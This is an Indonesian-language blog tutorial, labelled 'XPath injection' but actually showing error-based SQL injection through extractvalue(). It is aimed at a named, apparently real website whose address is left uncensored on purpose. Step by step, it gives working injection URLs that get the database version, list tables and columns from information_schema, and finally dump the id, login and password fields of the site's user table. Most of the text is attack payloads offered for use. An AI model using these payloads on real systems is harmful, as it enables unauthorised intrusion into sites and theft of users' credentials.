Xpath Injection I

assalamualaikum
ijin berbagi + menggalau + nyepam + icik2 big grin

Oke tutorial kali ini saya dapatkan dari teman kita bernama X'inject yg bertema xpath injection
Bagi yg udah tau harap minggat yah tongue
Ok apa itu xpath injection 
Xpath injection ialah suatu teknik untuk menginjeksi database guna untuk mengambil data sensitif 
di dalam dokumen XML yang ada dalam database di sebuah website=> kata om x’injext

led-lab.com/ang/detail_prod.php?ID=55&id_cat=4&id_cat1=22 <= TARGET
(maaf gak disensor karena udah 18++ tongue )
kita main manual kk big grin jangan lupa hidupin kemenyan nya big grin

http://i.imgur.com/ydPs8Zz.png


ada vurl kan tes lagi dah

http://i.imgur.com/BwVEt43.png


wahh tidak keluar yg error, lanut lagi

http://i.imgur.com/fHd6kWI.png


wew di atas error tuh
oke kita coba masukin http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 union select 1,2,3,4-- ada angka ajaib gak ya

http://i.imgur.com/Rfiz6yr.png



bahh surem kagak keluar angka ajaib nya, terpaksa kita memainkan nada2 cinta dulu Angry

LANJUT
masukan perintah ini
http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 and extractvalue(rand(),concat(0x3a,version()))--

[Image: 31TNW9D.png]

bisa dilihatkan versi berapa big grin, ayo lanjut lagi

memunculkan nama-nama table yang ada dalam web tersebut dengan cara Menggati perintah version() dengan select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)

http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 and extractvalue(rand(),concat(0x3a,(select concat(table_name) from information_schema.tables 
where table_schema=database() limit 0,1)))--

http://i.imgur.com/WLz72vx.png



nah itu limit 0,1)))— kita atur2 saja sampai berbau nama admin or apa lah, liat sini
http://i.imgur.com/PLhyGP0.png



Langkah selanjutnya ialah memunculkan nama kolom-kolom yang ada dalam table tersebut dengan cara 
mengganti perintah table_name dengan perintah column_name dan mengganti perintah .tables 
setelah information_schema dengan .columns , serta mengganti perintah table_schema= menjadi 
table_name= dan diikuti dengan hasil hash hexa atau mysql char dari nama table yang kita curigai 
sebagai sarang admin 

Sehingga perintahnya menjadi: 

and extractvalue(rand(),concat(0x3a,(select concat(column_name) from information_schema.columns 
where table_name=0x6c65645f7573657273 limit 0,1)))--
6c65645f7573657273 adalah hasil hexa dari led_users

http://i.imgur.com/YmRXu6g.png


hasil nya XPATH syntax error: ':id' sama kaya tadi kita otak atik aja limit 0,1 sampau dapat yg kita cari
kalo udah di otak atik tar dapat id,login dan pswd (LIAT GAMBAR )


http://i.imgur.com/krEAUtz.png



http://i.imgur.com/7eb4PXi.png



nah dari semua di atas bisa langsung kita liat id,login dan passwd nya dg perintah

http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 and extractvalue(rand(),concat(0x3a,(select concat(id,0x3a,login,0x3a,pswd) from led_users)))--

http://i.imgur.com/WDRudLU.png



oke sekian dari saya
Share:

0 comments:

Post a Comment